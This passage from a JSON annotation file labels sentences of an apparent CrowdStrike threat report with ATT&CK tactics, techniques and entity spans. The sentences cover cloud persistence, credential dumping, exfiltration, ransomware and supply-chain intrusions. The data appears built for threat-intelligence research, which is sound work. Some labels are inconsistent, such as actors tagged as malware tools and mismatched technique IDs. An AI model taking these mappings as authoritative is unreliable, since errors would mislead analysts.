AADINTERNALS AZURE AD BACKDOOR.2", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.001", "name": "Additional Cloud Credentials" } ], "procedure": "registering additional authentication factors", "entities": [ { "text": "REGISTERING ADDITIONAL AUTHENTICATION FACTORS IN ENTRA ID", "start": 46, "end": 103, "label": "Action" }, { "text": "SCATTERED SPIDER", "start": 105, "end": 121, "label": "ThreatActor" }, { "text": " USED AN IDENTITY PROVIDER TO ESTABLISH PERSISTENCE", "start": 121, "end": 172, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s120-c16aab", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 120, "context_before": "AT THE IDENTITY LEVEL IS COMMONLY ACHIEVED BY REGISTERING ADDITIONAL AUTHENTICATION FACTORS IN ENTRA ID.\nSCATTERED SPIDER USED AN IDENTITY PROVIDER TO ESTABLISH PERSISTENCE WITH A FEDERATED DOMAIN IN ENTRA ID, INITIALLY RELYING ON AADINTERNALS AZURE AD BACKDOOR.2", "sentence_text": "THIS PROVIDED THE ADVERSARY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s121-e5a435", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 121, "context_before": "THIS PROVIDED THE ADVERSARY", "sentence_text": "WITH PERSISTENT ACCESS TO MULTIPLE ENTRA ID IDENTITIES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s122-2fb2ca", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 122, "context_before": "WITH PERSISTENT ACCESS TO MULTIPLE ENTRA ID IDENTITIES.", "sentence_text": "LATER, SCATTERED SPIDER TRANSFERRED THE CONCEPT TO OKTA AND ADDED A FEDERATED IDENTITY PROVIDER TO A VICTIM’S OKTA TENANT.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "add a federated identity provider to a victim’s okta tenant to maintain persistence", "entities": [ { "text": "SCATTERED SPIDER", "start": 7, "end": 23, "label": "ThreatActor" }, { "text": "ADDED A FEDERATED IDENTITY PROVIDER TO A VICTIM’S OKTA TENANT", "start": 60, "end": 121, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s123-a208a3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 123, "context_before": "LATER, SCATTERED SPIDER TRANSFERRED THE CONCEPT TO OKTA AND ADDED A FEDERATED IDENTITY PROVIDER TO A VICTIM’S OKTA TENANT.", "sentence_text": "Privilege Escalation\nAdversaries escalated privileges by obtaining access to additional identities from stored credentials, social engineering campaigns or insecure password-reset portals.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "adversaries obtained access to additional identities from stored credentials, social engineering campaigns or insecure password-reset portals", "entities": [ { "text": "Adversaries ", "start": 21, "end": 33, "label": "MalwareTool" }, { "text": "obtaining access to additional identities from stored credentials", "start": 57, "end": 122, "label": "Action" }, { "text": "social engineering campaigns", "start": 124, "end": 152, "label": "Action" }, { "text": "insecure password-reset portals", "start": 156, "end": 187, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s124-7242fe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 124, "context_before": "Privilege Escalation\nAdversaries escalated privileges by obtaining access to additional identities from stored credentials, social engineering campaigns or insecure password-reset portals.", "sentence_text": "They also escalated privileges by modifying policies or adding identities to privileged groups or roles.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "escalating privileges by modifying policies or adding identities to privileged groups", "entities": [ { "text": "modifying policies", "start": 34, "end": 52, "label": "Action" }, { "text": "adding identities to privileged groups or roles.", "start": 56, "end": 104, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s125-71e9ea", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 125, "context_before": "They also escalated privileges by modifying policies or adding identities to privileged groups or roles.", "sentence_text": "IN THE WILD DURING AN INTRUSION TARGETING A NORTH AMERICAN SOFTWARE COMPANY, SCATTERED SPIDER ESCALATED PRIVILEGES BY ATTACHING A NEW ADMINISTRATOR ACCESS POLICY TO A PREEXISTING CLOUD USER, TO WHICH THEY ADDED A NEW ACCESS KEY.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "SCATTERED SPIDER attached a new admin policy to pre-existing cloud user to which they added a new access key", "entities": [ { "text": "SCATTERED SPIDER", "start": 77, "end": 93, "label": "ThreatActor" }, { "text": "ATTACHING A NEW ADMINISTRATOR ACCESS POLICY", "start": 118, "end": 161, "label": "Action" }, { "text": "PREEXISTING CLOUD USER", "start": 167, "end": 189, "label": "Infrastructure_Indicator" }, { "text": "ADDED A NEW ACCESS KEY.", "start": 205, "end": 228, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s126-2e1b43", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 126, "context_before": "IN THE WILD DURING AN INTRUSION TARGETING A NORTH AMERICAN SOFTWARE COMPANY, SCATTERED SPIDER ESCALATED PRIVILEGES BY ATTACHING A NEW ADMINISTRATOR ACCESS POLICY TO A PREEXISTING CLOUD USER, TO WHICH THEY ADDED A NEW ACCESS KEY.", "sentence_text": "2 https://aadinternals.com/post/aadbackdoor/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s127-e51820", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 127, "context_before": "2 https://aadinternals.com/post/aadbackdoor/", "sentence_text": "Credential Access\nThreat actors harvested credentials from password stores and information repositories.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Harvest credentials from password stores and information repositories.", "entities": [ { "text": "Threat actors", "start": 18, "end": 31, "label": "ThreatActor" }, { "text": "harvested credentials from password stores and information repositories", "start": 32, "end": 103, "label": "Action" }, { "text": "password stores", "start": 59, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "information repositories", "start": 79, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s128-a3946e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 128, "context_before": "Credential Access\nThreat actors harvested credentials from password stores and information repositories.", "sentence_text": "IN THE WILD INDRIK SPIDER ACCESSED CREDENTIALS STORED IN AZURE KEY VAULT.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.005", "name": "Cloud Instance Metadata API" } ], "procedure": "INDRIK SPIDER accessed credentials stored in azure key vaults", "entities": [ { "text": "INDRIK SPIDER", "start": 12, "end": 25, "label": "ThreatActor" }, { "text": " ACCESSED CREDENTIALS", "start": 25, "end": 46, "label": "Action" }, { "text": "STORED IN AZURE KEY VAULT", "start": 47, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s129-d55288", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 129, "context_before": "IN THE WILD INDRIK SPIDER ACCESSED CREDENTIALS STORED IN AZURE KEY VAULT.", "sentence_text": "IN A SEPARATE ATTACK, SCATTERED SPIDER ACCESSED CREDENTIALS STORED IN A CLOUD SECRETS MANAGER, AN IDENTITY-BASED SECRETS AND ENCRYPTION MANAGEMENT SYSTEM, AND SHAREPOINT.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1552.005", "name": "Cloud Instance Metadata API" }, { "id": "T1213.002", "name": "Sharepoint" } ], "procedure": "SCATTERED SPIDER accessed credentials in cloud secret manager, identity-based and encryption management system, and sharepoint", "entities": [ { "text": "SCATTERED SPIDER", "start": 22, "end": 38, "label": "ThreatActor" }, { "text": "ACCESSED CREDENTIALS", "start": 39, "end": 59, "label": "Action" }, { "text": "CLOUD SECRETS MANAGER", "start": 72, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "IDENTITY-BASED SECRETS AND ENCRYPTION MANAGEMENT SYSTEM", "start": 98, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "SHAREPOINT", "start": 159, "end": 169, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s130-1008a0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 130, "context_before": "IN A SEPARATE ATTACK, SCATTERED SPIDER ACCESSED CREDENTIALS STORED IN A CLOUD SECRETS MANAGER, AN IDENTITY-BASED SECRETS AND ENCRYPTION MANAGEMENT SYSTEM, AND SHAREPOINT.", "sentence_text": "INTO WHICH THEY MOUNTED DOMAIN-CONTROLLER DISK COPIES.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "mount domain-controller disk copies", "entities": [ { "text": "MOUNTED DOMAIN-CONTROLLER DISK COPIES", "start": 16, "end": 53, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s131-9fc0f7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 131, "context_before": "INTO WHICH THEY MOUNTED DOMAIN-CONTROLLER DISK COPIES.", "sentence_text": "FROM THOSE DISK COPIES, THE ADVERSARY DUMPED ACTIVE DIRECTORY (AD)\nDATABASE NTDS.DIT.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "adversary dumped database through disk copies", "entities": [ { "text": "DISK COPIES", "start": 11, "end": 22, "label": "MalwareTool" }, { "text": "ADVERSARY", "start": 28, "end": 37, "label": "MalwareTool" }, { "text": "DUMPED ", "start": 38, "end": 45, "label": "Action" }, { "text": "NTDS.DIT", "start": 76, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s132-06b69f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 132, "context_before": "FROM THOSE DISK COPIES, THE ADVERSARY DUMPED ACTIVE DIRECTORY (AD)\nDATABASE NTDS.DIT.", "sentence_text": "Lateral Movement\nThreat actors moved back and forth between on-premises and cloud environments.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "lateral movement of actors", "entities": [ { "text": "Threat actors", "start": 17, "end": 30, "label": "ThreatActor" }, { "text": "moved back and forth", "start": 31, "end": 51, "label": "Action" }, { "text": "on-premises and cloud environments", "start": 60, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s133-0d5b2c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 133, "context_before": "Lateral Movement\nThreat actors moved back and forth between on-premises and cloud environments.", "sentence_text": "IN THE WILD SCATTERED SPIDER OFTEN USED ACCESS TO VICTIMS’ MICROSOFT 365 ENVIRONMENTS TO SEARCH SHAREPOINT ONLINE", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213.002", "name": "Sharepoint" } ], "procedure": "SCATTERED SPIDER used access to search sharepoint", "entities": [ { "text": "SCATTERED SPIDER", "start": 12, "end": 28, "label": "ThreatActor" }, { "text": "USED ACCESS", "start": 35, "end": 46, "label": "Action" }, { "text": "SEARCH SHAREPOINT", "start": 89, "end": 106, "label": "Action" }, { "text": "VICTIMS’ MICROSOFT 365 ENVIRONMENTS", "start": 50, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s134-e50539", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 134, "context_before": "IN THE WILD SCATTERED SPIDER OFTEN USED ACCESS TO VICTIMS’ MICROSOFT 365 ENVIRONMENTS TO SEARCH SHAREPOINT ONLINE", "sentence_text": "FOR VIRTUAL PRIVATE NETWORK (VPN) SETUP INSTRUCTIONS AND THEN LOGGED ON TO THE VPN AND MOVED LATERALLY TO ON-PREMISES SERVERS.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "SCATTERED SPIDER logged on vpn and moved laterally", "entities": [ { "text": "MOVED LATERALLY", "start": 87, "end": 102, "label": "Action" }, { "text": "LOGGED ON", "start": 62, "end": 71, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s135-339f43", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 135, "context_before": "FOR VIRTUAL PRIVATE NETWORK (VPN) SETUP INSTRUCTIONS AND THEN LOGGED ON TO THE VPN AND MOVED LATERALLY TO ON-PREMISES SERVERS.", "sentence_text": "SCATTERED SPIDER WAS ALSO OBSERVED USING AZURE RUN COMMANDS AND SIMILAR CAPABILITIES TO MOVE LATERALLY FROM THE CLOUD CONTROL PLANE TO COMPUTE INSTANCES.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "SCATTERED SPIDER use azure run command and similar tools to move laterally", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "USING AZURE RUN COMMANDS", "start": 35, "end": 59, "label": "Action" }, { "text": "MOVE LATERALLY", "start": 88, "end": 102, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s136-8755e3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 136, "context_before": "SCATTERED SPIDER WAS ALSO OBSERVED USING AZURE RUN COMMANDS AND SIMILAR CAPABILITIES TO MOVE LATERALLY FROM THE CLOUD CONTROL PLANE TO COMPUTE INSTANCES.", "sentence_text": "Exfiltration\nAdversaries exfiltrated data by using tooling, by directly downloading data from internet-accessible repositories — such as SharePoint Online or GitHub — or by uploading data to internet-accessible web services.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" }, { "id": "T1048", "name": "Exfiltration Over Alternative Protocol" } ], "procedure": "Adversaries exfiltrated data", "entities": [ { "text": "Adversaries ", "start": 13, "end": 25, "label": "MalwareTool" }, { "text": "exfiltrated data", "start": 25, "end": 41, "label": "Action" }, { "text": "directly downloading data", "start": 63, "end": 88, "label": "Action" }, { "text": "uploading ", "start": 173, "end": 183, "label": "Action" }, { "text": " internet-accessible repositories", "start": 93, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "internet-accessible web", "start": 191, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "using tooling", "start": 45, "end": 58, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p19-s137-8dceb4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 19, "sentence_id": 137, "context_before": "Exfiltration\nAdversaries exfiltrated data by using tooling, by directly downloading data from internet-accessible repositories — such as SharePoint Online or GitHub — or by uploading data to internet-accessible web services.", "sentence_text": "IN THE WILD SCATTERED SPIDER LEVERAGED THE OPEN-SOURCE S3 BROWSER TO EXFILTRATE DATA TO AN EXTERNAL, ADVERSARY-CONTROLLED CLOUD STORAGE BUCKET.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "SCATTERED SPIDER leveraged S3 browser to exfiltrate data to cloud storage bucket", "entities": [ { "text": "SCATTERED SPIDER", "start": 12, "end": 28, "label": "ThreatActor" }, { "text": "LEVERAGED ", "start": 29, "end": 39, "label": "Action" }, { "text": "S3 BROWSER", "start": 55, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "EXFILTRATE DATA", "start": 69, "end": 84, "label": "Action" }, { "text": "EXTERNAL, ADVERSARY-CONTROLLED CLOUD STORAGE BUCKET", "start": 91, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s138-02933f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 138, "context_before": "IN THE WILD SCATTERED SPIDER LEVERAGED THE OPEN-SOURCE S3 BROWSER TO EXFILTRATE DATA TO AN EXTERNAL, ADVERSARY-CONTROLLED CLOUD STORAGE BUCKET.", "sentence_text": "Impact\nSome cloud-conscious BGH threat actors targeted cloud storage as part of their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s139-a9e67b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 139, "context_before": "Impact\nSome cloud-conscious BGH threat actors targeted cloud storage as part of their operations.", "sentence_text": "IN THE WILD BGH TACTICS AND DEPLOYING RANSOMWARE FOR IMPACT.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "BGH deployed ransomware for impact", "entities": [ { "text": "BGH ", "start": 12, "end": 16, "label": "MalwareTool" }, { "text": "DEPLOYING RANSOMWARE FOR IMPACT.", "start": 28, "end": 60, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s140-7b2a64", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 140, "context_before": "IN THE WILD BGH TACTICS AND DEPLOYING RANSOMWARE FOR IMPACT.", "sentence_text": "IN A SEPARATE INCIDENT, AN ALPHA SPIDER AFFILIATE DEPLOYED TOOLING THAT ENABLES Alphv TO ENCRYPT AZURE STORAGE FILE SHARES.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ALPHA SPIDER AFFILIATE deployed tooling to encrypt azure storage files", "entities": [ { "text": "ALPHA SPIDER AFFILIATE", "start": 27, "end": 49, "label": "ThreatActor" }, { "text": "DEPLOYED TOOLING", "start": 50, "end": 66, "label": "Action" }, { "text": "ENCRYPT AZURE STORAGE FILE SHARES", "start": 89, "end": 122, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s141-5c5d4f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 141, "context_before": "IN A SEPARATE INCIDENT, AN ALPHA SPIDER AFFILIATE DEPLOYED TOOLING THAT ENABLES Alphv TO ENCRYPT AZURE STORAGE FILE SHARES.", "sentence_text": "IN A LockBit INCIDENT, INDRIK SPIDER DELETED BACKUPS STORED IN AZURE BACKUPS.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "INDRIK SPIDER deleted backups stored in azure backups", "entities": [ { "text": "INDRIK SPIDER", "start": 23, "end": 36, "label": "ThreatActor" }, { "text": "DELETED BACKUPS", "start": 37, "end": 52, "label": "Action" }, { "text": "STORED IN AZURE BACKUPS", "start": 53, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s142-838a7d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 142, "context_before": "IN A LockBit INCIDENT, INDRIK SPIDER DELETED BACKUPS STORED IN AZURE BACKUPS.", "sentence_text": "THIRD-PARTY\nRELATIONSHIP EXPLOITATION\nThroughout 2023, targeted intrusion actors consistently attempted to exploit trusted relationships to gain initial access to organizations across multiple verticals and regions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "intrusion actors exploit trusted relationships", "entities": [ { "text": "intrusion actors", "start": 64, "end": 80, "label": "ThreatActor" }, { "text": " exploit trusted relationships", "start": 106, "end": 136, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s143-ccdce8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 143, "context_before": "THIRD-PARTY\nRELATIONSHIP EXPLOITATION\nThroughout 2023, targeted intrusion actors consistently attempted to exploit trusted relationships to gain initial access to organizations across multiple verticals and regions.", "sentence_text": "This type of attack takes advantage of vendor-client relationships to deploy malicious tooling via two key techniques: 1) compromising the software supply chain using trusted software to spread malicious tooling and 2) leveraging access to vendors supplying IT services.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" }, { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "attack takes advantage of vendor-client relationships to deploy malicious tooling", "entities": [ { "text": "takes advantage of vendor-client relationships", "start": 20, "end": 66, "label": "Action" }, { "text": "malicious tooling", "start": 77, "end": 94, "label": "MalwareTool" }, { "text": "deploy ", "start": 70, "end": 77, "label": "Action" }, { "text": " compromising the software supply chain ", "start": 121, "end": 161, "label": "Action" }, { "text": " leveraging access to vendors supplying IT services", "start": 218, "end": 269, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s144-493ce9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 144, "context_before": "This type of attack takes advantage of vendor-client relationships to deploy malicious tooling via two key techniques: 1) compromising the software supply chain using trusted software to spread malicious tooling and 2) leveraging access to vendors supplying IT services.", "sentence_text": "Threat actors targeting third-party relationships are motivated by the potential return on investment (ROI): One compromised organization can lead to hundreds or thousands of follow-on targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p20-s145-59cdca", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 20, "sentence_id": 145, "context_before": "Threat actors targeting third-party relationships are motivated by the potential return on investment (ROI): One compromised organization can lead to hundreds or thousands of follow-on targets.", "sentence_text": "These stealthy attacks can also more effectively provide an opportunity for attackers seeking to exploit a hardened end target.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s146-b84537", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 146, "context_before": "These stealthy attacks can also more effectively provide an opportunity for attackers seeking to exploit a hardened end target.", "sentence_text": "Threat Highlight:\nTrusted-Relationship Compromises by China-Nexus Adversaries In 2023, China-nexus adversaries increasingly targeted third-party relationships in efforts to deploy malicious implants and gain initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "trusted relationship compromises by china-nexus adversaries", "entities": [ { "text": "Trusted-Relationship Compromises", "start": 18, "end": 50, "label": "Action" }, { "text": "China-Nexus Adversaries ", "start": 54, "end": 78, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s147-f079e4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 147, "context_before": "Threat Highlight:\nTrusted-Relationship Compromises by China-Nexus Adversaries In 2023, China-nexus adversaries increasingly targeted third-party relationships in efforts to deploy malicious implants and gain initial access.", "sentence_text": "Two adversaries — JACKPOT PANDA and CASCADE PANDA — consistently exploited trusted relationships through supply chain compromises and actor-on-the-side FOR MORE INFORMATION ON ANY OF or actor-in-the-middle attacks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" }, { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1598.004", "name": "Spearphishing Voice" } ], "procedure": "JACKPOT PADNA and CASCADE PANDA exploited trusted relationships", "entities": [ { "text": "JACKPOT PANDA", "start": 18, "end": 31, "label": "MalwareTool" }, { "text": "CASCADE PANDA", "start": 36, "end": 49, "label": "MalwareTool" }, { "text": "exploited trusted relationships", "start": 65, "end": 96, "label": "Action" }, { "text": "supply chain compromises", "start": 105, "end": 129, "label": "Action" }, { "text": "actor-on-the-side", "start": 134, "end": 151, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s148-0363e6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 148, "context_before": "Two adversaries — JACKPOT PANDA and CASCADE PANDA — consistently exploited trusted relationships through supply chain compromises and actor-on-the-side FOR MORE INFORMATION ON ANY OF or actor-in-the-middle attacks.", "sentence_text": "The trojanized installer served from CloudChat’s website contained the first stage of a multi-step process that ultimately deployed XShade — a novel implant with code that overlaps with JACKPOT PANDA’s unique CplRAT implant.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "the trojanized installer deployed XShade", "entities": [ { "text": "The trojanized installer served", "start": 0, "end": 31, "label": "ThreatActor" }, { "text": "deployed XShade", "start": 123, "end": 138, "label": "Action" }, { "text": "JACKPOT PANDA", "start": 186, "end": 199, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s149-e2280b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 149, "context_before": "The trojanized installer served from CloudChat’s website contained the first stage of a multi-step process that ultimately deployed XShade — a novel implant with code that overlaps with JACKPOT PANDA’s unique CplRAT implant.", "sentence_text": "LiveHelp100 is associated with Comm100, a software utility targeted by a JACKPOT PANDA supply chain compromise in September 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s150-682abd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 150, "context_before": "LiveHelp100 is associated with Comm100, a software utility targeted by a JACKPOT PANDA supply chain compromise in September 2022.", "sentence_text": "QuestDownloader was ultimately used to deploy Cobalt Strike and UltraVNC.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "QuestDownloader was used to deploy cobalt strike and UltraVNC", "entities": [ { "text": "QuestDownloader ", "start": 0, "end": 16, "label": "MalwareTool" }, { "text": "used to deploy Cobalt Strike and UltraVNC", "start": 31, "end": 72, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s151-482a2c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 151, "context_before": "QuestDownloader was ultimately used to deploy Cobalt Strike and UltraVNC.", "sentence_text": "In all CASCADE PANDA instances from this time period, legitimate software update processes connected to legitimate infrastructure associated with respective products and legitimate Chinese internet service provider infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s152-8858ba", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 152, "context_before": "In all CASCADE PANDA instances from this time period, legitimate software update processes connected to legitimate infrastructure associated with respective products and legitimate Chinese internet service provider infrastructure.", "sentence_text": "CASCADE PANDA likely distributes WinDealer by using domestic infrastructure to redirect legitimate traffic in transit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p21-s153-4d2c38", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 21, "sentence_id": 153, "context_before": "CASCADE PANDA likely distributes WinDealer by using domestic infrastructure to redirect legitimate traffic in transit.", "sentence_text": "In one instance, CASCADE PANDA used a legitimate trojanized Chinese-language translation tool executable to deploy WinDealer.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "CASCADE PANDA used a legitimate trojanized tool to deploy WinDealer", "entities": [ { "text": "CASCADE PANDA", "start": 17, "end": 30, "label": "MalwareTool" }, { "text": "used a legitimate trojanized Chinese-language translation tool", "start": 31, "end": 93, "label": "Action" }, { "text": "deploy WinDealer", "start": 108, "end": 124, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s154-38fb15", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 154, "context_before": "In one instance, CASCADE PANDA used a legitimate trojanized Chinese-language translation tool executable to deploy WinDealer.", "sentence_text": "Unattributed targeted intrusion actors using TTPs consistent with China-nexus adversaries also exploited trusted relationships to 